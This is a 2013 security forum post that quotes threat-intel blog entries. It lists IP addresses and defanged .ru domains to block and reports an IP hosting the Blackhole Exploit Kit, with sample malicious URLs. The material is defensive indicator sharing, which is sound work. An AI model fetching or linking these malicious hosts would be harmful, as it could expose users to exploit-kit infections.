The following IPs and domains are all related and should be blocked:
82.148.98.36
195.210.47.208
202.72.245.146
bananamamor.ru
damagalko .ru
dekamerionka .ru
dfudont .ru
disownon .ru
dmpsonthh .ru
dmssmgf .ru
dumarianoko .ru
eghirhiam .ru
epiratko .ru
esekundi .ru
evkotnka .ru
evskindarka .ru
evujalo .ru
exiansik .ru
eziponoma .ru ..."
___

Something evil on 50.116.40.194
- http://blog.dynamoo....5011640194.html
1 Feb 2013 - "50.116.40.194 (Linode, US) is hosting the Blackhole Exploit Kit (e.g. [donotclick]14.goodstudentloans .org/read/walls_levels.php - report here*) and seems to have been active in the past 24 hours. I can see two domains at present, although there are probably many more ready to go:
14.goodstudentloans .org
14.mattresstoppersreviews .net"
* http://urlquery.net/...t.php?id=903191

Edited by AplusWebMaster, 01 February 2013 - 10:46 AM.